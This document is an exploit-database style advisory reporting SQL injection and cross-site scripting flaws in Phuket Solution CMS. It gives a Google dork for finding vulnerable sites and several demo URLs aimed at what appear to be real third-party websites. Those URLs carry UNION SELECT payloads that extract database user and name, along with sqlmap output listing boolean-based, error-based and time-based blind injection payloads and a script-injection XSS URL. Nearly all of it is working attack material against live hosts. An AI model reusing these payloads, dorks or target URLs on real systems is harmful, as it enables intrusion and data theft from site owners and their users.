#Exploit Title: PHUKET SOLUTIONCMS SQL Injection and XSS Vulnerability #Date: 2020-10-04 #Exploit Author: Mostafa Farzaneh #Vendor Homepage: www.phuketsolution.com #Google Dork:" Powered by Phuket Solution" or "Developed by Phuket Solution" or "Designed & Developed by Phuket Designer" #Category: webapps #Tested On: windows 10, Firefox #Software Link: https://www.phuketsolution.com/portfolio.html SQL Injection Demo: http://henryscollection.com/product.php?products=-748%27%20UNION%20SELECT%201,2,3,4,user(),database(),7--%20- Demo: http://www.theattitudeclub.com/saturdayscondo/themeweb/news-detail.php?id=75 [SQL Injection Vulnerability] Demo:https://www.sawasdeephuketproperty.com/properties-list.php?property-types=1&types=2%27 sqlmap resumed the following injection point(s) from stored session: --- Parameter: property-types (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: property-types=1 AND 6120=6120&types=2 Vector: AND [INFERENCE] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: property-types=1 AND (SELECT 9297 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT (ELT(9297=9297,1))),0x717a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&types=2 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: property-types=1 AND (SELECT 8964 FROM (SELECT(SLEEP(5)))pKeR)&types=2 Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 ################################################################################ Cross Site Scripting (XSS) Demo: https://www.sawasdeephuketproperty.com/properties-list.php?property-types=1&types=2&location=&prices=&bedroom=&code=%22%2F%3E%3Cscript%3Ealert%28%22PywebSecurity%22%29%3C%2Fscript%3E%3E ********************************************************* #Discovered by: Mostafa Farzaneh from PywebSecurity team #Telegram: @pyweb_security *********************************************************